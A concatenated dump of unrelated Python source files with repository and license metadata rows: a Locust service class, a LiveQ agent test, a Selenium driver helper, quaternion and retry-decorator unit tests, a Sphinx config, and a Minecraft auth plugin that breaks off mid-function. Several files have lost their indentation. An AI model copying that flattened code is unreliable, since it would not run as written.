**kwargs: Custom install options.
"""
inst_opt = deepcopy(self.install_opt)
inst_opt.update(kwargs)
# pylint: disable=W0142
print super(LocustService, self).service_install(**inst_opt)
def _change_supervisor_autostart(self, value):
""" Change autostart parameter in supervisor config file."""
cfg_path = os.path.join(self.super_conf_path,
self.name + self.super_conf_ext)
section = CONFIG_STORAGE.get_config(self.name, 'supervisord')
if not section:
sys.stderr.write(BaseErrMsg.cfg_tmpl_key.format(
cfg=self.name, name='supervisord'))
sys.exit(EXIT_CODE)
section = section[0]['section'].format(service_name=self.name)
self._change_cfg_prm(cfg_path, section, 'autostart', value)
def service_disable(self):
"""Disable autostart the locust agent service."""
if self._is_installed():
if self._is_running():
self.service_stop()
self._change_supervisor_autostart('false')
def service_enable(self):
"""Enable autostart the locust agent service."""
if self._is_installed():
if self._is_running():
self.service_stop()
self._change_supervisor_autostart('true')
self.service_start()
def service_start(self):
"""Start the locust agent service."""
if self._is_installed(stderr=False):
mconf = os.path.join(self.mod_conf_path,
self.name + self.mod_conf_ext)
msg = 'Config file {path} does not exist'.format(
path=mconf)
assert os.path.exists(mconf), msg
mconf = ConfigObj(mconf)
if not self._is_running():
kwargs = deepcopy(self.install_opt)
kwargs.update(
{'log_out_path': mconf['general']['log_out_path'],
'log_err_path': mconf['general']['log_err_path'],
'autostart': True})
if not os.path.exists(kwargs['log_out_path']):
os.makedirs(kwargs['log_out_path'])
if not os.path.exists(kwargs['log_err_path']):
os.makedirs(kwargs['log_err_path'])
# pylint: disable=W0142
self._create_supervisord_config(**kwargs)
super(LocustService, self).service_start()
print 'checking status...'
                # The timeout before checking the real service status should
                # be greater than the 'startsecs' option value (default 1 sec)
                # described in the process supervisor config file.
                # This functionality has moved to the end of the bserviceutil
                # class since other modules may not need it.
timeout = mconf['startsecs'] if 'startsecs' in mconf else 1.0
timeout += self.TIMEOUT_DELTA
sleep(timeout)
self.service_status()
def service_restart(self):
"""Restart the locust agent service."""
self.service_stop()
self.service_start()
| apache-2.0 | -7,804,406,327,212,588,000 | 32.5475 | 77 | 0.585066 | false |
wavesoft/LiveQ | liveq-agent/tests.py | 1 | 2485 | #!/usr/bin/python
################################################################
# LiveQ - An interactive volunteering computing batch system
# Copyright (C) 2013 Ioannis Charalampidis
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
################################################################
# ----------
import sys
sys.path.append("../liveq-common")
# ----------
import time
import logging
from agent.io.jobmanagers import JobManagers
from agent.config import Config
from liveq.exceptions import ConfigException
from liveq.reporting.postmortem import PostMortem
from liveq import handleSIGINT, exit
# Prepare runtime configuration
runtimeConfig = { }
# Load configuration
try:
Config.fromFile( "config/agent.conf.local", runtimeConfig )
except ConfigException as e:
print("ERROR Configuration exception: %s" % e)
exit(1)
# Hook sigint -> Shutdown
handleSIGINT()
# Setup post-mortem
PostMortem.addGlobalConfig("global", Config)
PostMortem.addGlobalInfo("version", "2.0")
# Prepare post-mortem
from subprocess import Popen, PIPE
pm = PostMortem()
p = Popen(["C:\\windows\\system32\\help.exe"], stdout=PIPE)
pm.addProcess("C:\\windows\\system32\\help.exe", p, stdout=True)
time.sleep(2)
pm.complete()
print pm.sections
a = str(pm.sections)
print pm.toBuffer()
b = pm.toBuffer()
print "dump=%i, compress=%i" % (len(a),len(b))
# EXIT
exit(0)
# Banner
logging.info("Starting agent tests %s" % Config.UUID)
# Login to the server
jobmanagers = JobManagers( Config.SERVER_CHANNEL )
def hsFunction(channel):
logging.info("Sending handshake to %s" % channel.name)
channel.send('handshake', {
'version': 2,
'slots': 0,
'free_slots': 0,
'group': 'debug'
})
jobmanagers.handshakeFn(hsFunction)
# Pick JIDs
while True:
jobmanagers.process(0.5)
print "--- Agent: %s" % jobmanagers.jid()
| gpl-2.0 | 7,826,109,199,466,112,000 | 25.157895 | 81 | 0.694567 | false |
HazenBabcock/brigl | test/driver.py | 1 | 2249 | #!/usr/bin/env python
"""
This returns an automated web browser to use for automated testing. It also
includes some utility functions.
https://www.seleniumhq.org/
http://selenium-python.readthedocs.io/
"""
import time
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# Web browser interface.
def getDriver():
"""
This is configured to use Chrome, change as desired.
"""
desired = DesiredCapabilities.CHROME
desired['loggingPrefs'] = {'browser' : 'ALL'}
options = webdriver.ChromeOptions()
options.add_argument("--window-size=1000,1000")
driver = webdriver.Chrome(executable_path="./chromedriver",
desired_capabilities = desired,
chrome_options = options)
return driver
# Utility functions.
class BRIGLTestException(Exception):
pass
def noSevereErrors(driver, ignore_404 = None):
    """
    ignore_404 - A list of files for which it is okay if they are missing.
    """
    # Copy to avoid mutating a shared default (mutable default arguments
    # persist between calls).
    ignore_404 = list(ignore_404 or []) + ["favicon.ico"]
log_data = driver.get_log('browser')
severe_errors = parseLog(log_data)
if (len(severe_errors) > 0):
is_severe = False
for s_err in severe_errors:
is_ignored = False
for i_404 in ignore_404:
if (i_404 in s_err['message']):
is_ignored = True
break
if not is_ignored:
is_severe = True
break
if is_severe:
print("Severe error(s) detected:")
for elt in severe_errors:
print(elt)
raise BRIGLTestException("Severe error(s) detected.")
def parseLog(log_data, level = 'SEVERE'):
"""
Return only those messages with the specified level.
"""
temp = []
for elt in log_data:
if (elt['level'] == level):
temp.append(elt)
return temp
def pprintLog(log_data):
"""
Pretty print log messages.
"""
for elt in log_data:
print(elt)
if (__name__ == "__main__"):
driver = getDriver()
print("version is", driver.capabilities['version'])
driver.close()
| gpl-3.0 | -7,560,753,491,243,775,000 | 24.850575 | 80 | 0.582926 | false |
ctogle/dilapidator | test/geometry/quat_tests.py | 1 | 6809 | from dilap.geometry.quat import quat
from dilap.geometry.vec3 import vec3
import dilap.geometry.tools as dpr
import matplotlib.pyplot as plt
import unittest,numpy,math
import pdb
#python3 -m unittest discover -v ./ "*tests.py"
class test_quat(unittest.TestCase):
def test_av(self):
a = 3*dpr.PI4
u1,u2,u3 = vec3(1,0,0),vec3(0,-1,0),vec3(0,0,1)
q1,q2 = quat(0,0,0,0).av(a,u1),quat(0,0,0,0).av(a,u2)
q3,q4 = quat(0,0,0,0).av(-a,u3),quat(0,0,0,0).av(-a,u2)
self.assertTrue(q1.w > 0.1)
self.assertTrue(q1.x > 0.1)
self.assertTrue(dpr.isnear(q1.y,0))
self.assertTrue(dpr.isnear(q1.z,0))
self.assertTrue(q2.w > 0.1)
self.assertTrue(dpr.isnear(q2.x,0))
self.assertTrue(q2.y < -0.1)
self.assertTrue(dpr.isnear(q2.z,0))
self.assertTrue(q3.w > 0.1)
self.assertTrue(dpr.isnear(q3.x,0))
self.assertTrue(dpr.isnear(q3.y,0))
self.assertTrue(q3.z < -0.1)
self.assertFalse(q2 == q4.cp().flp())
self.assertTrue(q2 == q4.cnj())
def test_uu(self):
u1,u2,u3 = vec3(1,0,0),vec3(0,-1,0),vec3(0,0,1)
q1,q2 = quat(0,0,0,0).uu(u1,u2),quat(0,0,0,0).uu(u1,u3)
q3,q4 = quat(0,0,0,0).uu(u2,u3),quat(0,0,0,0).uu(u3,u2)
self.assertTrue(q1.w > 0.1)
self.assertTrue(dpr.isnear(q1.x,0))
self.assertTrue(dpr.isnear(q1.y,0))
self.assertTrue(q1.z < -0.1)
self.assertTrue(q2.w > 0.1)
self.assertTrue(dpr.isnear(q2.x,0))
self.assertTrue(q2.y < -0.1)
self.assertTrue(dpr.isnear(q2.z,0))
self.assertTrue(q3 == q4.cnj())
def test_toxy(self):
q1 = quat(0,0,0,0).toxy(vec3(0,0,-1))
#print('toxy\v\t',q1)
self.assertEqual(q1.w,0)
self.assertEqual(q1.x,1)
def test_cp(self):
q1 = quat(1,2,3,4)
self.assertTrue(q1 is q1)
self.assertFalse(q1 is q1.cp())
self.assertTrue(q1 == q1.cp())
#def test_cpf(self):
def test_isnear(self):
q1,q2 = quat(1,1,1,0),quat(1,1,1,0.1)
q3,q4 = quat(1,1,1,1),quat(1,1.000001,1,1)
self.assertEqual(q1.isnear(q1),1)
self.assertEqual(q3.isnear(q3),1)
self.assertEqual(q1.isnear(q2),0)
self.assertEqual(q2.isnear(q1),0)
self.assertEqual(q1.isnear(q3),0)
self.assertEqual(q2.isnear(q3),0)
self.assertEqual(q2.isnear(q4),0)
self.assertEqual(q3.isnear(q4),1)
def test_mag2(self):
q1,q2,q3 = quat(1,0,0,0),quat(1,1,1,0),quat(0,2,5,11)
self.assertEqual(dpr.isnear(q1.mag2(),1),1)
self.assertEqual(dpr.isnear(q2.mag2(),3),1)
self.assertEqual(dpr.isnear(q3.mag2(),150),1)
def test_mag(self):
q1,q2,q3 = quat(1,0,0,0),quat(1,1,1,0),quat(0,2,5,11)
self.assertEqual(dpr.isnear(q1.mag(),1),1)
self.assertEqual(dpr.isnear(q2.mag(),math.sqrt(3)),1)
self.assertEqual(dpr.isnear(q3.mag(),math.sqrt(150)),1)
def test_nrm(self):
q1,q2,q3 = quat(1,0,0,0),quat(1,1,1,0),quat(0,2,5,11)
self.assertEqual(dpr.isnear(q1.cp().nrm().mag(),1),1)
self.assertEqual(dpr.isnear(q2.cp().nrm().mag(),1),1)
self.assertEqual(dpr.isnear(q3.cp().nrm().mag(),1),1)
self.assertTrue(q1.cp().nrm().mag() == q1.mag())
self.assertTrue(q1.nrm() is q1)
self.assertFalse(q2.cp().nrm().mag() == q2.mag())
self.assertTrue(q2.nrm() is q2)
self.assertFalse(q3.cp().nrm().mag() == q3.mag())
self.assertTrue(q3.nrm() is q3)
def test_flp(self):
q1,q2 = quat(1,0,0,0),quat(1,1,1,0)
q3,q4 = quat(0,2,5,11),quat(-1,1,1,0)
self.assertFalse(q1.cp().flp() == q1)
self.assertFalse(q2.cp().flp() == q2)
self.assertTrue(q3.cp().flp() == q3)
self.assertFalse(q4.cp().flp() == q4)
self.assertTrue(q2.cp().flp() == q4)
self.assertTrue(q1.flp() is q1)
self.assertTrue(q2.flp() is q2)
self.assertTrue(q3.flp() is q3)
self.assertTrue(q4.flp() is q4)
def test_uscl(self):
q1,q2 = quat(1,0,0,0),quat(1,1,1,0)
q3,q4 = quat(0,2,5,11),quat(0,1,2.5,5.5)
self.assertTrue(q1.cp().uscl(1) == q1)
self.assertFalse(q1.cp().uscl(3) == q1)
self.assertTrue(q2.cp().uscl(1) == q2)
self.assertFalse(q2.cp().uscl(3) == q2)
self.assertTrue(q3.cp().uscl(0.5) == q4)
self.assertTrue(q1.uscl(1) is q1)
def test_cnj(self):
q1,q2 = quat(1,0,0,0),quat(1,1,1,0)
q3,q4 = quat(-1,2,5,11),quat(1,-2,-5,-11)
self.assertTrue(q1.cp().cnj() == q1)
self.assertTrue(q1.cnj() is q1)
self.assertFalse(q2.cp().cnj() == q2)
self.assertFalse(q3.cnj() == q4)
def test_inv(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.threePI4,vec3(0,0,1)
q1,q2 = quat(1,0,0,0).av(a1,v1),quat(1,1,1,0).av(a2,v2)
self.assertEqual(q1.cp().cnj(),q1.inv())
self.assertEqual(q2.cp().cnj(),q2.inv())
self.assertFalse(q1.inv() is q1)
def test_add(self):
q1,q2 = quat(0.5,0.3,-2.2,3),quat(1,1.1,2,-0.5)
q3 = quat(1.5,1.4,-0.2,2.5)
self.assertEqual(q1.add(q2),q3)
self.assertFalse(q1.add(q2) is q1)
def test_sub(self):
q1,q2 = quat(0.5,0.3,-2.2,3),quat(1,1.1,2,-0.5)
q3 = quat(-0.5,-0.8,-4.2,3.5)
self.assertEqual(q1.sub(q2),q3)
self.assertFalse(q1.sub(q2) is q1)
def test_mul(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.threePI4,vec3(0,0,1)
q1,q2 = quat(1,0,0,0).av(a1,v1),quat(1,1,1,0).av(a2,v1)
q3 = quat(0,1,0,0).av(a1+a2,v2)
self.assertTrue(q1.mul(q2) == q3)
self.assertFalse(q1.mul(q2) is q1)
def test_rot(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.PI2,vec3(0,0,1)
q1,q2 = quat(1,0,0,0).av(a1,v1),quat(1,1,1,0).av(a1,v1)
q3 = quat(0,1,0,0).av(a2,v2)
self.assertTrue(q1.rot(q2) == q3)
self.assertTrue(q1.rot(q2) is q1)
#def test_rotps(self):
def test_dot(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.PI2,vec3(0,1,0)
q1,q2 = quat(1,0,0,0).av(a1,v1),quat(1,1,1,0).av(a1,v1)
q3 = quat(0,1,0,0).av(a2,v2)
q4 = quat(0,1,0,0).av(0,v1)
self.assertTrue(dpr.isnear(q1.dot(q2),q1.mag2()))
self.assertFalse(dpr.isnear(q1.dot(q3),0))
self.assertTrue(dpr.isnear(q3.dot(q4),q3.w))
def test_slerp(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.PI,vec3(0,0,1)
q1,q2 = quat(1,0,0,0).av(0,v1),quat(1,1,1,0).av(a1,v1)
q3 = quat(0,1,0,0).av(a2,v2)
self.assertEqual(q1.slerp(q3,0.25),q2)
self.assertFalse(q1.slerp(q3,0.25) is q1)
if __name__ == '__main__':
unittest.main()
| mit | -8,675,543,976,464,371,000 | 33.21608 | 63 | 0.545455 | false |
carlos-jenkins/plantweb | test/sphinxconf/conf.py | 1 | 9536 | # -*- coding: utf-8 -*-
#
# PlantwebTest documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 24 03:02:39 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import unicode_literals, absolute_import
from __future__ import print_function, division
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'plantweb.directive'
]
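# With the directive extension above loaded, reST sources can embed diagrams
# directly. A minimal sketch of the documented usage (diagram text is
# illustrative):
#
#   .. uml::
#
#      Alice -> Bob: authentication request
#      Bob --> Alice: authentication response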
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'PlantwebTest'
copyright = '2016-2017, Carlos Jenkins'
author = 'Carlos Jenkins'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PlantwebTestdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
# Latex figure (float) alignment
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
'PlantwebTest.tex',
'PlantwebTest Documentation',
'Carlos Jenkins',
'manual'
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc,
'plantwebtest',
'PlantwebTest Documentation',
[author],
1
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
'PlantwebTest',
'PlantwebTest Documentation',
author,
'PlantwebTest',
'One line description of project.',
'Miscellaneous'
),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
| apache-2.0 | -4,205,343,303,474,952,700 | 30.681063 | 79 | 0.692429 | false |
sbunatyan/retrylib | retrylib/tests/test_decorators.py | 1 | 7444 | #!/usr/bin/env python
# Copyright (c) 2014 Sergey Bunatyan <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from retrylib.tests import base
import retrylib
from retrylib import decorators
RETRY_ATTEMPTS = 5
START_DELAY = 0
STEP = 1
MAX_DELAY = 2
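# The decorator under test is typically applied like this (illustrative
# sketch; the flaky callable and exception type are hypothetical):
#
#   @decorators.retry(RETRY_ATTEMPTS, delay=START_DELAY, step=STEP,
#                     max_delay=MAX_DELAY, retry_on=(IOError,))
#   def flaky_call():
#       ...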
class SuperPuperException(Exception):
pass
class DontRetryException(Exception):
pass
class FakeClass(mock.Mock):
@retrylib.retry(RETRY_ATTEMPTS, delay=0)
def retry_method_works_incorrect(self):
self.retry_count()
raise SuperPuperException()
@decorators.retry(RETRY_ATTEMPTS, delay=0,
retry_on=(SuperPuperException,))
def retry_method_works_incorrect_2(self):
self.retry_count()
raise DontRetryException()
@retrylib.retry(RETRY_ATTEMPTS, delay=0)
def retry_method_works_correct(self):
self.retry_count()
@decorators.retry(RETRY_ATTEMPTS, delay=START_DELAY,
step=STEP)
def retry_with_custom_step(self):
self.retry_count()
raise SuperPuperException()
@decorators.retry(RETRY_ATTEMPTS, delay=START_DELAY,
step=STEP, max_delay=MAX_DELAY)
def retry_with_max_delay(self):
self.retry_count()
raise SuperPuperException()
class RetryTestCase(base.TestCase):
def setUp(self):
self._target = FakeClass()
def test_must_retry_three_time_and_raise_exception(self):
self.assertRaises(
SuperPuperException,
self._target.retry_method_works_incorrect)
self.assertEqual(self._target.retry_count.call_count,
RETRY_ATTEMPTS)
def test_must_retry_one_time_and_return_correct_result(self):
self.assertIsNone(self._target.retry_method_works_correct())
self.assertEqual(self._target.retry_count.call_count, 1)
def test_dont_retry_on_unexpected_error(self):
"""Don't retry if exception isn't SuperPuperException"""
self.assertRaises(
DontRetryException,
self._target.retry_method_works_incorrect_2)
self.assertEqual(self._target.retry_count.call_count, 1)
@mock.patch('time.sleep')
def test_step_is_works(self, sleep):
"""Retry delay increases to step value"""
self.assertRaises(
SuperPuperException,
self._target.retry_with_custom_step)
sleep.assert_has_calls([
mock.call(START_DELAY),
mock.call(START_DELAY + STEP)
])
@mock.patch('time.sleep')
def test_max_delay_works(self, sleep):
"""Retry delay increases to step value"""
self.assertRaises(
SuperPuperException,
self._target.retry_with_max_delay)
sleep.assert_has_calls([
mock.call(START_DELAY),
mock.call(START_DELAY + STEP),
mock.call(MAX_DELAY),
mock.call(MAX_DELAY)
])
def test_retry_works_with_function_without_parameters(self):
@decorators.retry(RETRY_ATTEMPTS, delay=0)
def function_without_parameters():
return "OK"
self.assertEqual(function_without_parameters(), "OK")
class LoggerTestCase(base.TestCase):
def setUp(self):
super(LoggerTestCase, self).setUp()
self.logger = mock.MagicMock()
@mock.patch('time.sleep')
def test_works_without_logger(self, sleep):
class Counter(object):
def __init__(self):
self._value = 0
@property
def value(self):
return self._value
def inc(self):
self._value += 1
@decorators.retry(RETRY_ATTEMPTS,
retry_on=(SuperPuperException,))
def bad_function(counter):
counter.inc()
raise SuperPuperException()
counter = Counter()
self.assertRaises(SuperPuperException,
bad_function,
counter)
self.assertEqual(counter.value, RETRY_ATTEMPTS)
@mock.patch('time.sleep')
def test_predefined_logger_is_used(self, sleep):
"""decorators.retry uses logger to write debug information
Decorator writes warning messages about retries.
"""
@decorators.retry(RETRY_ATTEMPTS,
logger=self.logger,
retry_on=(SuperPuperException,))
def bad_function():
raise SuperPuperException()
self.assertRaises(SuperPuperException,
bad_function)
self.assertEqual(self.logger.warning.call_count,
RETRY_ATTEMPTS - 1)
@mock.patch('time.sleep')
def test_object_logger_is_used(self, sleep):
"""decorators.retry uses object's logger"""
class TestClass(object):
def __init__(self):
self.logger = mock.MagicMock()
def get_logger(self):
return self.logger
@decorators.retry(RETRY_ATTEMPTS,
retry_on=(SuperPuperException,))
def reliable_method(self):
raise SuperPuperException()
obj = TestClass()
self.assertRaises(SuperPuperException,
obj.reliable_method)
self.assertEqual(obj.logger.warning.call_count,
RETRY_ATTEMPTS - 1)
@mock.patch('time.sleep')
def test_object_logger_is_used_predefined_is_ignored(self, sleep):
"""decorators.retry ignores predefined logger
In case when object logger is defined.
"""
class TestClass(object):
def __init__(self):
self.logger = mock.MagicMock()
def get_logger(self):
return self.logger
@decorators.retry(RETRY_ATTEMPTS,
logger=self.logger,
retry_on=(SuperPuperException,))
def reliable_method(self):
raise SuperPuperException()
obj = TestClass()
self.assertRaises(SuperPuperException,
obj.reliable_method)
self.assertEqual(self.logger.warning.call_count,
0)
self.assertEqual(obj.logger.warning.call_count,
RETRY_ATTEMPTS - 1)
@mock.patch('time.sleep')
def test_works_if_get_logger_isnt_defined(self, sleep):
"""decorators works if get_logger isn't defined"""
class TestClass(object):
def __init__(self):
pass
@decorators.retry(RETRY_ATTEMPTS,
retry_on=(SuperPuperException,))
def reliable_method(self):
raise SuperPuperException()
obj = TestClass()
self.assertRaises(SuperPuperException,
obj.reliable_method)
| apache-2.0 | -419,754,297,560,335,300 | 28.192157 | 70 | 0.591483 | false |
MrSwiss/SpockBot | spock/plugins/core/auth.py | 1 | 5050 | """
Provides authorization functions for Mojang's login and session servers
"""
import hashlib
import json
# This is for python2 compatibility
try:
import urllib.request as request
from urllib.error import URLError
except ImportError:
import urllib2 as request
from urllib2 import URLError
import logging
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from spock.mcp import yggdrasil
from spock.plugins.base import PluginBase
from spock.utils import pl_announce
logger = logging.getLogger('spock')
backend = default_backend()
# This function courtesy of barneygale
def java_hex_digest(digest):
d = int(digest.hexdigest(), 16)
if d >> 39 * 4 & 0x8:
d = "-%x" % ((-d) & (2 ** (40 * 4) - 1))
else:
d = "%x" % d
return d
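# Sanity check against the community protocol docs (values as published
# there; treat as illustrative):
#
#   java_hex_digest(hashlib.sha1(b'Notch'))  # '4ed1f46bbe04bc756bcb17c0c7ce3e4632f06a48'
#   java_hex_digest(hashlib.sha1(b'jeb_'))   # '-7c9d5b0044c130109a5d7b5fb5c317c02b4e28c1'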
class AuthCore(object):
def __init__(self, authenticated, event):
self.event = event
self.authenticated = authenticated
self.username = None
self.selected_profile = None
self.shared_secret = None
self.ygg = yggdrasil.YggAuth()
def start_session(self, username, password=''):
rep = {}
if self.authenticated:
logger.info("AUTHCORE: Attempting login with username: %s",
username)
rep = self.ygg.authenticate(username, password)
if rep is None or 'error' in rep:
logger.error('AUTHCORE: Login Unsuccessful, Response: %s', rep)
self.event.emit('AUTH_ERR')
return rep
if 'selectedProfile' in rep:
self.selected_profile = rep['selectedProfile']
self.username = rep['selectedProfile']['name']
logger.info("AUTHCORE: Logged in as: %s", self.username)
logger.info("AUTHCORE: Selected Profile: %s",
self.selected_profile)
else:
self.username = username
else:
self.username = username
return rep
def gen_shared_secret(self):
self.shared_secret = os.urandom(16)
return self.shared_secret
@pl_announce('Auth')
class AuthPlugin(PluginBase):
requires = ('Event', 'Net')
defaults = {
'authenticated': True,
'auth_quit': True,
'sess_quit': True,
}
events = {
'AUTH_ERR': 'handle_auth_error',
'SESS_ERR': 'handle_session_error',
'LOGIN<Encryption Request': 'handle_encryption_request',
}
def __init__(self, ploader, settings):
super(AuthPlugin, self).__init__(ploader, settings)
self.authenticated = self.settings['authenticated']
self.auth_quit = self.settings['auth_quit']
self.sess_quit = self.settings['sess_quit']
self.auth = AuthCore(self.authenticated, self.event)
self.auth.gen_shared_secret()
ploader.provides('Auth', self.auth)
def handle_auth_error(self, name, data):
if self.auth_quit:
self.event.kill()
def handle_session_error(self, name, data):
if self.sess_quit:
self.event.kill()
# Encryption Key Request - Request for client to start encryption
def handle_encryption_request(self, name, packet):
pubkey_raw = packet.data['public_key']
if self.authenticated:
serverid = java_hex_digest(hashlib.sha1(
packet.data['server_id'].encode('ascii') +
self.auth.shared_secret +
pubkey_raw
))
logger.info(
"AUTHPLUGIN: Attempting to authenticate session with "
"sessionserver.mojang.com")
url = "https://sessionserver.mojang.com/session/minecraft/join"
data = json.dumps({
'accessToken': self.auth.ygg.access_token,
'selectedProfile': self.auth.selected_profile,
'serverId': serverid,
}).encode('utf-8')
headers = {'Content-Type': 'application/json'}
req = request.Request(url, data, headers)
try:
rep = request.urlopen(req).read().decode('ascii')
except URLError:
rep = 'Couldn\'t connect to sessionserver.mojang.com'
if rep != "":
logger.warning("AUTHPLUGIN: %s", rep)
self.event.emit('SESS_ERR')
else:
logger.info("AUTHPLUGIN: Session authentication successful")
pubkey = serialization.load_der_public_key(pubkey_raw, backend)
